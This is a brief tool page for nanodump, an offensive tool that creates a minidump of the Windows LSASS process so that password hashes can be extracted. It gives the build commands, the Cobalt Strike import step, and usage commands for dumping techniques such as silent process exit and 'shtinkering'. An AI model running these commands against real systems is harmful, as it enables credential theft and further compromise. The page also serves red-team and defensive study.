nanodump

The LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs.

Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further.

This allows for the creation of a minidump of the LSASS process.

Install:

git clone https://github.com/helpsystems/nanodump.git

Install: (Linux with MinGW)

make -f Makefile.mingw

Install: (Windows with MSVC)

nmake -f Makefile.msvc

Install: (CobaltStrike only)

Import the NanoDump.cna script on Cobalt Strike.

Full installation information can be found here.

Usage:

# Run
nanodump.x64.exe

# Leverage the Silent Process Exit technique
nanodump --silent-process-exit C:\Windows\Temp\

# Leverage the Shtinkering technique
nanodump --shtinkering

Full usage information can be found here.